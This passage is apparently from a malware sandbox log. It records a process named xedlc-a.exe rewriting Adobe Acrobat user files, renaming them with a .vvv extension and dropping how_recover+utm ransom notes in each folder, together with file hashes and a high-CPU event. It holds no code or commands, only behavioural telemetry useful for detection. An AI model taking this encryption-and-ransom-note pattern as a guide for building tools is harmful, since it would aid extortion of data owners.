46418.          fid (ads:): 844424930199506
46419.          ntstatus: 0x0
46420.          CreateOptions: 0x60
46421.        file:
46422.          timestamp: 65921
46423.          mode: close
46424.          sequenceNumber: 726
46425.          value: C:\9b9vmbghrNMdA2\how_recover+utm.txt
46426.          filesize: 2682
46427.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
46428.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
46429.          processinfo:
46430.            pid: 1056
46431.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46432.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46433.            ads:
46434.          fid (ads:): 844424930199506
46435.          ntstatus: 0x0
46436.          CreateOptions: 0x0
46437.        file:
46438.          timestamp: 65942
46439.          mode: created
46440.          sequenceNumber: 727
46441.          value: C:\9b9vmbghrNMdA2\how_recover+utm.html
46442.          processinfo:
46443.            pid: 1056
46444.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46445.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46446.            ads:
46447.          fid (ads:): 562949953488854
46448.          ntstatus: 0x0
46449.          CreateOptions: 0x60
46450.        file:
46451.          timestamp: 65989
46452.          mode: close
46453.          sequenceNumber: 728
46454.          value: C:\9b9vmbghrNMdA2\how_recover+utm.html
46455.          filesize: 9495
46456.          md5sum: 95f596a25dff51b6af2042b1bbe02985
46457.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
46458.          processinfo:
46459.            pid: 1056
46460.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46461.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46462.            ads:
46463.          fid (ads:): 562949953488854
46464.          ntstatus: 0x0
46465.          CreateOptions: 0x0
46466.        file:
46467.          timestamp: 65994
46468.          mode: find
46469.          sequenceNumber: 729
46470.          value: C:\Documents and Settings\*
46471.          processinfo:
46472.            pid: 1056
46473.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46474.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46475.          ntstatus: 0x0
46476.          CreateOptions: 0x0
46477.        file:
46478.          timestamp: 66006
46479.          mode: find
46480.          sequenceNumber: 730
46481.          value: C:\Documents and Settings\*\*
46482.          processinfo:
46483.            pid: 1056
46484.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46485.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46486.          ntstatus: 0x0
46487.          CreateOptions: 0x0
46488.        file:
46489.          timestamp: 66009
46490.          mode: find
46491.          sequenceNumber: 731
46492.          value: C:\Documents and Settings\*\Application Data\*
46493.          processinfo:
46494.            pid: 1056
46495.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46496.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46497.          ntstatus: 0x0
46498.          CreateOptions: 0x0
46499.        file:
46500.          timestamp: 66090
46501.          mode: open
46502.          sequenceNumber: 732
46503.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\TMGrpPrm.sav
46504.          filesize: 566
46505.          processinfo:
46506.            pid: 1056
46507.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46508.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46509.            ads:
46510.          fid (ads:): 562949953480939
46511.          ntstatus: 0x0
46512.          CreateOptions: 0x60
46513.        high_cpu:
46514.          timestamp: 66095
46515.          sequenceNumber: 733
46516.          total_cpu: 100
46517.          processinfo:
46518.            tainted: true
46519.            pid: 1824
46520.            process_cpu: 100
46521.            imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
46522.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46523.        file:
46524.          timestamp: 66426
46525.          mode: close
46526.          sequenceNumber: 734
46527.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\TMGrpPrm.sav
46528.          filesize: 990
46529.          md5sum: 9e34bc93256def5cfb3e477a242b77c4
46530.          sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
46531.          processinfo:
46532.            pid: 1056
46533.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46534.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46535.            ads:
46536.          fid (ads:): 562949953480939
46537.          ntstatus: 0x0
46538.          CreateOptions: 0x0
46539.        file:
46540.          timestamp: 66435
46541.          mode: rename
46542.          sequenceNumber: 735
46543.          filesize: 990
46544.          md5sum: 9e34bc93256def5cfb3e477a242b77c4
46545.          sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
46546.          processinfo:
46547.            pid: 1056
46548.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46549.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46550.          old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\TMGrpPrm.sav
46551.          new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\TMGrpPrm.sav.vvv
46552.            ads:
46553.          fid (ads:): 562949953480939
46554.          ntstatus: 0x0
46555.          CreateOptions: 0x0
46556.        file:
46557.          timestamp: 66462
46558.          mode: created
46559.          sequenceNumber: 736
46560.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\how_recover+utm.txt
46561.          processinfo:
46562.            pid: 1056
46563.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46564.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46565.            ads:
46566.          fid (ads:): 281474976778199
46567.          ntstatus: 0x0
46568.          CreateOptions: 0x60
46569.        file:
46570.          timestamp: 66470
46571.          mode: close
46572.          sequenceNumber: 737
46573.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\how_recover+utm.txt
46574.          filesize: 2682
46575.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
46576.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
46577.          processinfo:
46578.            pid: 1056
46579.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46580.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46581.            ads:
46582.          fid (ads:): 281474976778199
46583.          ntstatus: 0x0
46584.          CreateOptions: 0x0
46585.        file:
46586.          timestamp: 66489
46587.          mode: created
46588.          sequenceNumber: 738
46589.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\how_recover+utm.html
46590.          processinfo:
46591.            pid: 1056
46592.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46593.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46594.            ads:
46595.          fid (ads:): 281474976778200
46596.          ntstatus: 0x0
46597.          CreateOptions: 0x60
46598.        file:
46599.          timestamp: 66501
46600.          mode: close
46601.          sequenceNumber: 739
46602.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\10.0\how_recover+utm.html
46603.          filesize: 9495
46604.          md5sum: 95f596a25dff51b6af2042b1bbe02985
46605.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
46606.          processinfo:
46607.            pid: 1056
46608.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46609.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46610.            ads:
46611.          fid (ads:): 281474976778200
46612.          ntstatus: 0x0
46613.          CreateOptions: 0x0
46614.        file:
46615.          timestamp: 66512
46616.          mode: open
46617.          sequenceNumber: 740
46618.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\TMGrpPrm.sav
46619.          filesize: 566
46620.          processinfo:
46621.            pid: 1056
46622.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46623.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46624.            ads:
46625.          fid (ads:): 562949953480940
46626.          ntstatus: 0x0
46627.          CreateOptions: 0x60
46628.        file:
46629.          timestamp: 66532
46630.          mode: close
46631.          sequenceNumber: 741
46632.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\TMGrpPrm.sav
46633.          filesize: 990
46634.          md5sum: 9e34bc93256def5cfb3e477a242b77c4
46635.          sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
46636.          processinfo:
46637.            pid: 1056
46638.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46639.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46640.            ads:
46641.          fid (ads:): 562949953480940
46642.          ntstatus: 0x0
46643.          CreateOptions: 0x0
46644.        file:
46645.          timestamp: 66556
46646.          mode: rename
46647.          sequenceNumber: 742
46648.          filesize: 990
46649.          md5sum: 9e34bc93256def5cfb3e477a242b77c4
46650.          sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
46651.          processinfo:
46652.            pid: 1056
46653.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46654.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46655.          old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\TMGrpPrm.sav
46656.          new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\TMGrpPrm.sav.vvv
46657.            ads:
46658.          fid (ads:): 562949953480940
46659.          ntstatus: 0x0
46660.          CreateOptions: 0x0
46661.        file:
46662.          timestamp: 66566
46663.          mode: created
46664.          sequenceNumber: 743
46665.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\how_recover+utm.txt
46666.          processinfo:
46667.            pid: 1056
46668.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46669.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46670.            ads:
46671.          fid (ads:): 281474976778201
46672.          ntstatus: 0x0
46673.          CreateOptions: 0x60
46674.        file:
46675.          timestamp: 66572
46676.          mode: close
46677.          sequenceNumber: 744
46678.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\how_recover+utm.txt
46679.          filesize: 2682
46680.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
46681.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
46682.          processinfo:
46683.            pid: 1056
46684.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46685.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46686.            ads:
46687.          fid (ads:): 281474976778201
46688.          ntstatus: 0x0
46689.          CreateOptions: 0x0
46690.        file:
46691.          timestamp: 66608
46692.          mode: created
46693.          sequenceNumber: 745
46694.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\how_recover+utm.html
46695.          processinfo:
46696.            pid: 1056
46697.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46698.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46699.            ads:
46700.          fid (ads:): 281474976778202
46701.          ntstatus: 0x0
46702.          CreateOptions: 0x60
46703.        file:
46704.          timestamp: 66614
46705.          mode: close
46706.          sequenceNumber: 746
46707.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\11.0\how_recover+utm.html
46708.          filesize: 9495
46709.          md5sum: 95f596a25dff51b6af2042b1bbe02985
46710.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
46711.          processinfo:
46712.            pid: 1056
46713.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46714.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46715.            ads:
46716.          fid (ads:): 281474976778202
46717.          ntstatus: 0x0
46718.          CreateOptions: 0x0
46719.        file:
46720.          timestamp: 66650
46721.          mode: created
46722.          sequenceNumber: 747
46723.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Collab\how_recover+utm.txt
46724.          processinfo:
46725.            pid: 1056
46726.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46727.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46728.            ads:
46729.          fid (ads:): 281474976778203
46730.          ntstatus: 0x0
46731.          CreateOptions: 0x60
46732.        file:
46733.          timestamp: 66657
46734.          mode: close
46735.          sequenceNumber: 748
46736.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Collab\how_recover+utm.txt
46737.          filesize: 2682
46738.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
46739.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
46740.          processinfo:
46741.            pid: 1056
46742.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46743.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46744.            ads:
46745.          fid (ads:): 281474976778203
46746.          ntstatus: 0x0
46747.          CreateOptions: 0x0
46748.        file:
46749.          timestamp: 66678
46750.          mode: created
46751.          sequenceNumber: 749
46752.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Collab\how_recover+utm.html
46753.          processinfo:
46754.            pid: 1056
46755.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46756.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46757.            ads:
46758.          fid (ads:): 281474976778204
46759.          ntstatus: 0x0
46760.          CreateOptions: 0x60
46761.        file:
46762.          timestamp: 66684
46763.          mode: close
46764.          sequenceNumber: 750
46765.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Collab\how_recover+utm.html
46766.          filesize: 9495
46767.          md5sum: 95f596a25dff51b6af2042b1bbe02985
46768.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
46769.          processinfo:
46770.            pid: 1056
46771.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46772.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46773.            ads:
46774.          fid (ads:): 281474976778204
46775.          ntstatus: 0x0
46776.          CreateOptions: 0x0
46777.        file:
46778.          timestamp: 66692
46779.          mode: open
46780.          sequenceNumber: 751
46781.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
46782.          filesize: 10
46783.          processinfo:
46784.            pid: 1056
46785.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46786.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46787.            ads:
46788.          fid (ads:): 281474976777392
46789.          ntstatus: 0x0
46790.          CreateOptions: 0x60
46791.        file:
46792.          timestamp: 66723
46793.          mode: close
46794.          sequenceNumber: 752
46795.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
46796.          filesize: 430
46797.          md5sum: 1ba711c91c2dc00e8407a31143007bd5
46798.          sha1sum: 2701821c042ac53b60fec0e0bf04f77da97b62fc
46799.          processinfo:
46800.            pid: 1056
46801.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46802.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46803.            ads:
46804.          fid (ads:): 281474976777392
46805.          ntstatus: 0x0
46806.          CreateOptions: 0x0
46807.        file:
46808.          timestamp: 66805
46809.          mode: rename
46810.          sequenceNumber: 753
46811.          filesize: 430
46812.          md5sum: 1ba711c91c2dc00e8407a31143007bd5
46813.          sha1sum: 2701821c042ac53b60fec0e0bf04f77da97b62fc
46814.          processinfo:
46815.            pid: 1056
46816.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46817.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46818.          old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
46819.          new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js.vvv
46820.            ads:
46821.          fid (ads:): 281474976777392
46822.          ntstatus: 0x0
46823.          CreateOptions: 0x0
46824.        file:
46825.          timestamp: 66814
46826.          mode: created
46827.          sequenceNumber: 754
46828.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\how_recover+utm.txt
46829.          processinfo:
46830.            pid: 1056
46831.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46832.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46833.            ads:
46834.          fid (ads:): 281474976778205
46835.          ntstatus: 0x0
46836.          CreateOptions: 0x60
46837.        file:
46838.          timestamp: 66821
46839.          mode: close
46840.          sequenceNumber: 755
46841.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\how_recover+utm.txt
46842.          filesize: 2682
46843.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
46844.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
46845.          processinfo:
46846.            pid: 1056
46847.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46848.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46849.            ads:
46850.          fid (ads:): 281474976778205
46851.          ntstatus: 0x0
46852.          CreateOptions: 0x0
46853.        file:
46854.          timestamp: 66841
46855.          mode: created
46856.          sequenceNumber: 756
46857.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\how_recover+utm.html
46858.          processinfo:
46859.            pid: 1056
46860.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46861.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46862.            ads:
46863.          fid (ads:): 281474976778206
46864.          ntstatus: 0x0
46865.          CreateOptions: 0x60
46866.        file:
46867.          timestamp: 66848
46868.          mode: close
46869.          sequenceNumber: 757
46870.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\JavaScripts\how_recover+utm.html
46871.          filesize: 9495
46872.          md5sum: 95f596a25dff51b6af2042b1bbe02985
46873.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
46874.          processinfo:
46875.            pid: 1056
46876.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46877.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46878.            ads:
46879.          fid (ads:): 281474976778206
46880.          ntstatus: 0x0
46881.          CreateOptions: 0x0
46882.        file:
46883.          timestamp: 66868
46884.          mode: created
46885.          sequenceNumber: 758
46886.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Preferences\how_recover+utm.txt
46887.          processinfo:
46888.            pid: 1056
46889.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46890.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46891.            ads:
46892.          fid (ads:): 281474976778207
46893.          ntstatus: 0x0
46894.          CreateOptions: 0x60
46895.        file:
46896.          timestamp: 66876
46897.          mode: close
46898.          sequenceNumber: 759
46899.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Preferences\how_recover+utm.txt
46900.          filesize: 2682
46901.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
46902.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
46903.          processinfo:
46904.            pid: 1056
46905.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46906.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46907.            ads:
46908.          fid (ads:): 281474976778207
46909.          ntstatus: 0x0
46910.          CreateOptions: 0x0
46911.        file:
46912.          timestamp: 66885
46913.          mode: created
46914.          sequenceNumber: 760
46915.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Preferences\how_recover+utm.html
46916.          processinfo:
46917.            pid: 1056
46918.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46919.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46920.            ads:
46921.          fid (ads:): 281474976778208
46922.          ntstatus: 0x0
46923.          CreateOptions: 0x60
46924.        file:
46925.          timestamp: 66893
46926.          mode: close
46927.          sequenceNumber: 761
46928.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Preferences\how_recover+utm.html
46929.          filesize: 9495
46930.          md5sum: 95f596a25dff51b6af2042b1bbe02985
46931.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
46932.          processinfo:
46933.            pid: 1056
46934.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46935.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46936.            ads:
46937.          fid (ads:): 281474976778208
46938.          ntstatus: 0x0
46939.          CreateOptions: 0x0
46940.        file:
46941.          timestamp: 66901
46942.          mode: open
46943.          sequenceNumber: 762
46944.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\TMGrpPrm.sav
46945.          filesize: 566
46946.          processinfo:
46947.            pid: 1056
46948.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46949.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46950.            ads:
46951.          fid (ads:): 562949953480937
46952.          ntstatus: 0x0
46953.          CreateOptions: 0x60
46954.        file:
46955.          timestamp: 66911
46956.          mode: close
46957.          sequenceNumber: 763
46958.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\TMGrpPrm.sav
46959.          filesize: 990
46960.          md5sum: 9e34bc93256def5cfb3e477a242b77c4
46961.          sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
46962.          processinfo:
46963.            pid: 1056
46964.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46965.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46966.            ads:
46967.          fid (ads:): 562949953480937
46968.          ntstatus: 0x0
46969.          CreateOptions: 0x0
46970.        file:
46971.          timestamp: 66921
46972.          mode: rename
46973.          sequenceNumber: 764
46974.          filesize: 990
46975.          md5sum: 9e34bc93256def5cfb3e477a242b77c4
46976.          sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
46977.          processinfo:
46978.            pid: 1056
46979.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46980.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46981.          old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\TMGrpPrm.sav
46982.          new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\TMGrpPrm.sav.vvv
46983.            ads:
46984.          fid (ads:): 562949953480937
46985.          ntstatus: 0x0
46986.          CreateOptions: 0x0
46987.        file:
46988.          timestamp: 66931
46989.          mode: open
46990.          sequenceNumber: 765
46991.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
46992.          filesize: 774
46993.          processinfo:
46994.            pid: 1056
46995.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
46996.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
46997.            ads:
46998.          fid (ads:): 281474976777388
46999.          ntstatus: 0x0
47000.          CreateOptions: 0x60
47001.        file:
47002.          timestamp: 67017
47003.          mode: close
47004.          sequenceNumber: 766
47005.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
47006.          filesize: 1198
47007.          md5sum: 86471f085850dfad47201dbb5472441d
47008.          sha1sum: cc877087a53ccc0d8022209b13a95f14f1f0d58f
47009.          processinfo:
47010.            pid: 1056
47011.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47012.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47013.            ads:
47014.          fid (ads:): 281474976777388
47015.          ntstatus: 0x0
47016.          CreateOptions: 0x0
47017.        file:
47018.          timestamp: 67026
47019.          mode: rename
47020.          sequenceNumber: 767
47021.          filesize: 1198
47022.          md5sum: 86471f085850dfad47201dbb5472441d
47023.          sha1sum: cc877087a53ccc0d8022209b13a95f14f1f0d58f
47024.          processinfo:
47025.            pid: 1056
47026.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47027.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47028.          old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
47029.          new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt.vvv
47030.            ads:
47031.          fid (ads:): 281474976777388
47032.          ntstatus: 0x0
47033.          CreateOptions: 0x0
47034.        file:
47035.          timestamp: 67038
47036.          mode: open
47037.          sequenceNumber: 768
47038.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
47039.          filesize: 195
47040.          processinfo:
47041.            pid: 1056
47042.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47043.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47044.            ads:
47045.          fid (ads:): 281474976777390
47046.          ntstatus: 0x0
47047.          CreateOptions: 0x60
47048.        file:
47049.          timestamp: 67044
47050.          mode: close
47051.          sequenceNumber: 769
47052.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
47053.          filesize: 622
47054.          md5sum: bbd74955ba8657f49634609f7ec42966
47055.          sha1sum: 61dd24ddbc69a0e86f642f3735faab1628211d02
47056.          processinfo:
47057.            pid: 1056
47058.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47059.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47060.            ads:
47061.          fid (ads:): 281474976777390
47062.          ntstatus: 0x0
47063.          CreateOptions: 0x0
47064.        file:
47065.          timestamp: 67054
47066.          mode: rename
47067.          sequenceNumber: 770
47068.          filesize: 622
47069.          md5sum: bbd74955ba8657f49634609f7ec42966
47070.          sha1sum: 61dd24ddbc69a0e86f642f3735faab1628211d02
47071.          processinfo:
47072.            pid: 1056
47073.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47074.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47075.          old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
47076.          new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js.vvv
47077.            ads:
47078.          fid (ads:): 281474976777390
47079.          ntstatus: 0x0
47080.          CreateOptions: 0x0
47081.        file:
47082.          timestamp: 67062
47083.          mode: created
47084.          sequenceNumber: 771
47085.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\how_recover+utm.txt
47086.          processinfo:
47087.            pid: 1056
47088.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47089.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47090.            ads:
47091.          fid (ads:): 281474976778209
47092.          ntstatus: 0x0
47093.          CreateOptions: 0x60
47094.        file:
47095.          timestamp: 67081
47096.          mode: close
47097.          sequenceNumber: 772
47098.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\how_recover+utm.txt
47099.          filesize: 2682
47100.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
47101.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
47102.          processinfo:
47103.            pid: 1056
47104.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47105.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47106.            ads:
47107.          fid (ads:): 281474976778209
47108.          ntstatus: 0x0
47109.          CreateOptions: 0x0
47110.        file:
47111.          timestamp: 67394
47112.          mode: created
47113.          sequenceNumber: 773
47114.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\how_recover+utm.html
47115.          processinfo:
47116.            pid: 1056
47117.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47118.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47119.            ads:
47120.          fid (ads:): 281474976778210
47121.          ntstatus: 0x0
47122.          CreateOptions: 0x60
47123.        file:
47124.          timestamp: 67456
47125.          mode: close
47126.          sequenceNumber: 774
47127.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\how_recover+utm.html
47128.          filesize: 9495
47129.          md5sum: 95f596a25dff51b6af2042b1bbe02985
47130.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
47131.          processinfo:
47132.            pid: 1056
47133.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47134.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47135.            ads:
47136.          fid (ads:): 281474976778210
47137.          ntstatus: 0x0
47138.          CreateOptions: 0x0
47139.        file:
47140.          timestamp: 67465
47141.          mode: created
47142.          sequenceNumber: 775
47143.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\how_recover+utm.txt
47144.          processinfo:
47145.            pid: 1056
47146.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47147.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47148.            ads:
47149.          fid (ads:): 281474976778211
47150.          ntstatus: 0x0
47151.          CreateOptions: 0x60
47152.        file:
47153.          timestamp: 67471
47154.          mode: close
47155.          sequenceNumber: 776
47156.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\how_recover+utm.txt
47157.          filesize: 2682
47158.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
47159.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
47160.          processinfo:
47161.            pid: 1056
47162.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47163.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47164.            ads:
47165.          fid (ads:): 281474976778211
47166.          ntstatus: 0x0
47167.          CreateOptions: 0x0
47168.        file:
